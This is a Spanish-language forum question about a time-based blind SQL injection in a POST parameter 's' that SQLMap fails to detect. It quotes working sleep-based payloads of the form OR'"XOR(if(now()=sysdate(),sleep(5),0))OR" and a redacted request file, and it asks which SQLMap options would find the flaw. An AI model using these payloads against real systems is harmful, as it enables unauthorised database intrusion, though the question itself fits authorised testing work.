Tengo una vulnerabilidad de inyección de SQL ciega verificada, pero SQLMap no puede reconocerla. Lo he verificado ingresando los siguientes parámetros para el parámetro POST "s":
s=OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"
Causes 5 second server response delay
también, esto funciona también:
s=OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"
Causes 10 second server response delay
He intentado una combinación de opciones para que SQLMap detecte esto pero sigue teniendo la incapacidad de encontrarlo. ¿Puede alguien decirme qué parámetros puedo usar para que SQLMap detecte esta vulnerabilidad?
Para su información, uso los parámetros -r y -p, ya que se trata de una vulnerabilidad posterior. Así es como se ve mi archivo -r:
POST /* HTTP/1.1
Host: *
Origin: http://*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://*/*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cache-Control: no-cache
s=